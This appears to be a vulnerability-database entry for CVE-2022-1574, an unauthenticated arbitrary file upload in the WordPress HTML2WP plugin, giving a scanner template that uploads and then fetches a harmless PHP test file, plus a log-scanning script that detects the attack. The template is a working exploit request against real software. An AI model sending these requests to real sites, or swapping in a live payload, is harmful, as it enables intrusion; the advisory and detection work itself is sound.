CVE-2022-1574: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload

Date: 2025-08-01 | Affected software: WordPress HTML2WP | PoC: Public

Vulnerability description

WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.

PoC code [public]

id: CVE-2022-1574

info:
  name: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.
  impact: |
    An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access.
  remediation: |
    Update to the latest version of the plugin or remove it if not needed.
  reference:
    - https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14
    - https://wordpress.org/plugins/html2wp/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1574
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1574
    cwe-id: CWE-352
    epss-score: 0.73672
    epss-percentile: 0.98774
    cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: html2wp_project
    product: html2wp
    framework: wordpress
  tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project

http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 253
        Content-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990
        Connection: close

        -----------------------------7816508136577551742878603990
        Content-Disposition: form-data; name="local_importing[]"; filename="{{randstr}}.php"
        Content-Type: text/html

        <?php

        echo "File Upload success";

        -----------------------------7816508136577551742878603990--
      - |
        GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 302"
          - "status_code_2 == 200"
          - "contains(body_2, 'File Upload success')"
        condition: and
# digest: 4a0a004730450221009d7300c4d0f6ade056f98cb2775ebbbf64b04d930da37b7646295669a810196b022041e8ecd6b01b72ec6955843deac7688358252351029c6178b49cfe268b562462:922c64590222798bb761d5b6d8e72950
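
Detection example (added here, not part of the template above or of the plugin's code): a log scan that flags the two requests the template sends, a POST to the html2wp-settings admin page followed by a script being served from the plugin's upload directory. The log lines are constructed, and the combined log format and the list of script extensions are assumptions to adapt to the server in question.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Access-log lines in combined format, constructed for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 302 0 "-" "curl/8.0"
203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /wp-content/uploads/html2wp/abc123.php HTTP/1.1" 200 19 "-" "curl/8.0"
198.51.100.9 - - [01/Aug/2025:10:05:00 +0000] "GET /wp-content/uploads/html2wp/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Aug/2025:10:06:00 +0000] "GET /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Aug/2025:10:07:00 +0000] "GET /blog/wp-content/uploads/html2wp/old.PHP HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_DIR = "/wp-content/uploads/html2wp/"
# Extensions often mapped to the PHP handler (assumption; match your server config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)


def classify(method, target, status):
    """Label one request as import-post, script-served, script-probe, or None."""
    url = urlsplit(target)
    if (method == "POST" and url.path.endswith("/wp-admin/admin.php")
            and parse_qs(url.query).get("page") == ["html2wp-settings"]):
        return "import-post"
    if UPLOAD_DIR in url.path and SCRIPT_EXT.search(url.path):
        return "script-served" if status == 200 else "script-probe"
    return None


def scan(log_text):
    """Per client IP: the labels seen, and whether a served script followed an import POST."""
    report = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, method, target, status = m[1], m[2], m[3], int(m[4])
        label = classify(method, target, status)
        if label is None:
            continue
        entry = report.setdefault(ip, {"labels": [], "upload_then_exec": False})
        if label == "script-served" and "import-post" in entry["labels"]:
            entry["upload_then_exec"] = True
        entry["labels"].append(label)
    return report


if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG).items():
        print(ip, finding)
```

Any `script-served` hit is worth checking against the file on disk even without a matching POST from the same address, since the upload and the retrieval can come from different clients.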